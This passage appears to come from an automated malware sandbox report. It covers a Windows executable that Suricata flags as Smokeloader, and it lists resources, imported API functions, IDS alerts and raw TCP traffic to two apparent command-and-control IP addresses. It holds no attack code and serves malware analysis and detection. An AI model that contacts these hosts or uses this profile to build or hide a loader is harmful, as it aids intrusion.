RT_STRING	0x273c0b0	0x78c	data			0.4254658385093168
RT_STRING	0x273c840	0x666	data			0.4340659340659341
RT_STRING	0x273cea8	0x69e	data			0.4268004722550177
RT_STRING	0x273d548	0x54c	data			0.44026548672566373
RT_STRING	0x273da98	0x26	data			0.5526315789473685
RT_GROUP_ICON	0x272d920	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x27383c8	0x76	data	Turkish	Turkey	0.6779661016949152
RT_GROUP_ICON	0x2728190	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2731ba0	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2738440	0x1b4	data			0.5848623853211009

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasExesLengthA, DeleteVolumeMountPointA, OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, SearchPathW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize

ADVAPI32.dll

ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-12T20:07:29.848902+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49792	119.204.11.2	80	TCP
2024-10-12T20:07:31.374913+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49799	119.204.11.2	80	TCP
2024-10-12T20:07:32.891080+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49809	119.204.11.2	80	TCP
2024-10-12T20:07:34.426343+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49820	119.204.11.2	80	TCP
2024-10-12T20:07:35.946752+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49831	119.204.11.2	80	TCP
2024-10-12T20:07:37.459108+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49841	119.204.11.2	80	TCP
2024-10-12T20:07:38.958859+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49849	119.204.11.2	80	TCP
2024-10-12T20:07:40.481991+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49861	119.204.11.2	80	TCP
2024-10-12T20:07:41.972367+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49870	119.204.11.2	80	TCP
2024-10-12T20:07:43.476100+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49881	119.204.11.2	80	TCP
2024-10-12T20:07:44.967534+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49892	119.204.11.2	80	TCP
2024-10-12T20:07:46.457451+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49903	119.204.11.2	80	TCP
2024-10-12T20:07:47.959801+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49914	119.204.11.2	80	TCP
2024-10-12T20:07:49.466916+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49925	119.204.11.2	80	TCP
2024-10-12T20:07:50.949811+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49932	119.204.11.2	80	TCP
2024-10-12T20:07:52.436567+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49943	119.204.11.2	80	TCP
2024-10-12T20:07:53.920305+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49954	119.204.11.2	80	TCP
2024-10-12T20:07:55.414257+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49964	119.204.11.2	80	TCP
2024-10-12T20:07:56.903613+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49972	119.204.11.2	80	TCP
2024-10-12T20:07:58.598972+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49983	119.204.11.2	80	TCP
2024-10-12T20:08:00.089880+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49993	119.204.11.2	80	TCP
2024-10-12T20:08:01.634818+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49998	119.204.11.2	80	TCP
2024-10-12T20:08:03.281168+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49999	119.204.11.2	80	TCP
2024-10-12T20:08:04.804921+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50000	119.204.11.2	80	TCP
2024-10-12T20:08:08.140704+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50002	119.204.11.2	80	TCP
2024-10-12T20:08:09.781553+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50003	119.204.11.2	80	TCP
2024-10-12T20:08:11.264790+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50004	119.204.11.2	80	TCP
2024-10-12T20:08:12.807847+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50005	119.204.11.2	80	TCP
2024-10-12T20:08:15.107333+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50006	119.204.11.2	80	TCP
2024-10-12T20:08:16.639263+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50007	119.204.11.2	80	TCP
2024-10-12T20:08:18.120800+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50008	119.204.11.2	80	TCP
2024-10-12T20:08:19.640221+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50009	119.204.11.2	80	TCP
2024-10-12T20:08:21.135939+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50010	119.204.11.2	80	TCP
2024-10-12T20:08:22.613113+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50011	119.204.11.2	80	TCP
2024-10-12T20:08:23.941825+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50012	119.204.11.2	80	TCP
2024-10-12T20:08:25.476955+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50013	119.204.11.2	80	TCP
2024-10-12T20:09:34.491548+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50014	119.204.11.2	80	TCP
2024-10-12T20:09:39.836652+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50015	119.204.11.2	80	TCP
2024-10-12T20:09:45.207552+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50016	119.204.11.2	80	TCP
2024-10-12T20:09:51.304176+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50017	119.204.11.2	80	TCP
2024-10-12T20:09:57.203146+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50018	119.204.11.2	80	TCP
2024-10-12T20:10:07.063551+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60089	175.119.10.231	80	TCP
2024-10-12T20:10:11.870177+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60090	175.119.10.231	80	TCP
2024-10-12T20:10:17.910339+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60091	175.119.10.231	80	TCP
2024-10-12T20:10:23.702222+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60092	175.119.10.231	80	TCP
2024-10-12T20:10:30.353244+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60093	175.119.10.231	80	TCP
2024-10-12T20:10:36.229845+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60094	175.119.10.231	80	TCP
2024-10-12T20:10:41.630767+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60095	175.119.10.231	80	TCP
2024-10-12T20:10:46.361537+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60096	175.119.10.231	80	TCP
2024-10-12T20:10:51.684157+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60097	175.119.10.231	80	TCP
2024-10-12T20:10:56.903490+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60098	175.119.10.231	80	TCP
2024-10-12T20:11:04.022959+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	60099	175.119.10.231	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 20:07:28.075416088 CEST	49792	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:28.080332041 CEST	80	49792	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:28.084074974 CEST	49792	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:28.084242105 CEST	49792	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:28.084254980 CEST	49792	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:28.089385986 CEST	80	49792	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:28.089456081 CEST	80	49792	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:29.848795891 CEST	80	49792	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:29.848814964 CEST	80	49792	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:29.848819017 CEST	80	49792	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:29.848901987 CEST	49792	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:29.849989891 CEST	49792	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:29.855135918 CEST	80	49792	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:29.856249094 CEST	49799	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:29.861108065 CEST	80	49799	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:29.861186028 CEST	49799	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:29.861692905 CEST	49799	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:29.861723900 CEST	49799	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:29.866565943 CEST	80	49799	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:29.866575003 CEST	80	49799	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:31.374404907 CEST	80	49799	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:31.374792099 CEST	80	49799	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:31.374912977 CEST	49799	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:31.375153065 CEST	49799	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:31.378616095 CEST	49809	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:31.379995108 CEST	80	49799	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:31.383480072 CEST	80	49809	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:31.385885000 CEST	49809	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:31.386056900 CEST	49809	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:31.386091948 CEST	49809	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:31.390966892 CEST	80	49809	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:31.391489029 CEST	80	49809	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:32.890898943 CEST	80	49809	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:32.890948057 CEST	80	49809	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:32.891079903 CEST	49809	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:32.891319990 CEST	49809	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:32.894352913 CEST	49820	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:32.896089077 CEST	80	49809	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:32.899163961 CEST	80	49820	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:32.899247885 CEST	49820	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:32.899426937 CEST	49820	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:32.899456024 CEST	49820	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:32.904236078 CEST	80	49820	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:32.904414892 CEST	80	49820	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:34.426244020 CEST	80	49820	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:34.426287889 CEST	80	49820	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:34.426342964 CEST	49820	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:34.426495075 CEST	49820	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:34.429492950 CEST	49831	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:34.431477070 CEST	80	49820	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:34.434863091 CEST	80	49831	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:34.434946060 CEST	49831	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:34.435060024 CEST	49831	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:34.435089111 CEST	49831	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:34.440107107 CEST	80	49831	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:34.440135956 CEST	80	49831	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:35.946641922 CEST	80	49831	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:35.946676016 CEST	80	49831	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:35.946752071 CEST	49831	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:35.946875095 CEST	49831	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:35.949459076 CEST	49841	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:35.951684952 CEST	80	49831	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:35.954246998 CEST	80	49841	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:35.955926895 CEST	49841	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:35.956039906 CEST	49841	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:35.956039906 CEST	49841	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:35.960818052 CEST	80	49841	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:35.961082935 CEST	80	49841	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:37.458920956 CEST	80	49841	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:37.459052086 CEST	80	49841	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:37.459108114 CEST	49841	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:37.459192038 CEST	49841	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:37.462085962 CEST	49849	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:37.464039087 CEST	80	49841	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:37.466983080 CEST	80	49849	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:37.467063904 CEST	49849	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:37.467190981 CEST	49849	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:37.467225075 CEST	49849	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:37.471970081 CEST	80	49849	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:37.472177982 CEST	80	49849	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:38.958609104 CEST	80	49849	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:38.958801985 CEST	80	49849	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:38.958858967 CEST	49849	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:38.958924055 CEST	49849	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:38.961695910 CEST	49861	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:38.963689089 CEST	80	49849	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:38.966685057 CEST	80	49861	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:38.966808081 CEST	49861	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:38.966912031 CEST	49861	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:38.967140913 CEST	49861	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:38.971641064 CEST	80	49861	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:38.971852064 CEST	80	49861	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:40.481789112 CEST	80	49861	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:40.481942892 CEST	80	49861	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:40.481991053 CEST	49861	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:40.483067989 CEST	49861	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:40.485280037 CEST	49870	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:40.487932920 CEST	80	49861	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:40.490185976 CEST	80	49870	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:40.490252018 CEST	49870	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:40.490367889 CEST	49870	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:40.490377903 CEST	49870	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:40.495178938 CEST	80	49870	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:40.495187044 CEST	80	49870	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:41.972019911 CEST	80	49870	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:41.972307920 CEST	80	49870	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:41.972367048 CEST	49870	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:41.972440958 CEST	49870	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:41.976982117 CEST	49881	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:41.977267981 CEST	80	49870	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:41.981909037 CEST	80	49881	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:41.982019901 CEST	49881	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:41.982127905 CEST	49881	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:41.982155085 CEST	49881	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:41.986932039 CEST	80	49881	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:41.987041950 CEST	80	49881	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:43.473678112 CEST	80	49881	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:43.474653006 CEST	80	49881	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:43.476099968 CEST	49881	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:43.476146936 CEST	49881	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:43.478612900 CEST	49892	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:43.481029034 CEST	80	49881	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:43.483577967 CEST	80	49892	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:43.483639956 CEST	49892	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:43.483773947 CEST	49892	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:43.483793020 CEST	49892	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:43.488534927 CEST	80	49892	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:43.488544941 CEST	80	49892	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:44.967206001 CEST	80	49892	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:44.967457056 CEST	80	49892	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:44.967534065 CEST	49892	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:44.967576981 CEST	49892	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:44.969868898 CEST	49903	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:44.972446918 CEST	80	49892	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:44.974981070 CEST	80	49903	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:44.975231886 CEST	49903	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:44.975231886 CEST	49903	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:44.975404024 CEST	49903	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:44.980185032 CEST	80	49903	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:44.980211020 CEST	80	49903	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:46.457277060 CEST	80	49903	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:46.457314014 CEST	80	49903	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:46.457451105 CEST	49903	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:46.457617998 CEST	49903	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:46.460134983 CEST	49914	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:46.462490082 CEST	80	49903	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:46.465078115 CEST	80	49914	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:46.465184927 CEST	49914	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:46.465318918 CEST	49914	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:46.465373039 CEST	49914	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:46.470110893 CEST	80	49914	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:46.470233917 CEST	80	49914	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:47.959476948 CEST	80	49914	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:47.959691048 CEST	80	49914	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:47.959800959 CEST	49914	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:47.959800959 CEST	49914	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:47.962589025 CEST	49925	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:47.964683056 CEST	80	49914	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:47.967750072 CEST	80	49925	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:47.967833996 CEST	49925	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:47.967969894 CEST	49925	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:47.968004942 CEST	49925	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:47.972826958 CEST	80	49925	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:47.972942114 CEST	80	49925	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:49.466757059 CEST	80	49925	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:49.466795921 CEST	80	49925	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:49.466916084 CEST	49925	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:49.467063904 CEST	49925	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:49.469439983 CEST	49932	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:49.471947908 CEST	80	49925	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:49.474510908 CEST	80	49932	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:49.474600077 CEST	49932	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:49.474919081 CEST	49932	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:49.474951029 CEST	49932	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:49.479720116 CEST	80	49932	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:49.479937077 CEST	80	49932	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:50.949657917 CEST	80	49932	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:50.949701071 CEST	80	49932	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:50.949810982 CEST	49932	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:50.949930906 CEST	49932	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:50.952074051 CEST	49943	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:50.954751968 CEST	80	49932	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:50.956986904 CEST	80	49943	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:50.957077980 CEST	49943	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:50.957179070 CEST	49943	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:50.957180023 CEST	49943	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:50.962038040 CEST	80	49943	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:50.962068081 CEST	80	49943	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:52.436352968 CEST	80	49943	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:52.436495066 CEST	80	49943	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:52.436567068 CEST	49943	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:52.436619043 CEST	49943	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:52.439568996 CEST	49954	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:52.441471100 CEST	80	49943	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:52.444452047 CEST	80	49954	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:52.444534063 CEST	49954	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:52.444674969 CEST	49954	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:52.444685936 CEST	49954	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:52.449487925 CEST	80	49954	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:52.449601889 CEST	80	49954	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:53.920020103 CEST	80	49954	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:53.920252085 CEST	80	49954	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:53.920305014 CEST	49954	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:53.920347929 CEST	49954	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:53.924154043 CEST	49964	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:53.925143957 CEST	80	49954	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:53.929255009 CEST	80	49964	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:53.929353952 CEST	49964	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:53.929517984 CEST	49964	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:53.929550886 CEST	49964	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:53.934362888 CEST	80	49964	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:53.934515953 CEST	80	49964	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:55.414083958 CEST	80	49964	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:55.414165974 CEST	80	49964	119.204.11.2	192.168.2.5
